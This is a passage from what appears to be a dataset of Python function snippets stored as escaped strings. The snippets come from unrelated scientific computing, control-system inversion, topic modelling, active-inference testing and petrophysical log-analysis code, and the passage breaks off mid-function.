U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def test_put_nveto_pmt_item(self):\n pass", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - 
kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n 
return rmse,mae,ce,r", "def test_get_nveto_pmt_item(self):\n pass", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, 
cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. #r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) 
~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 
0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij 
= (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. 
time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume 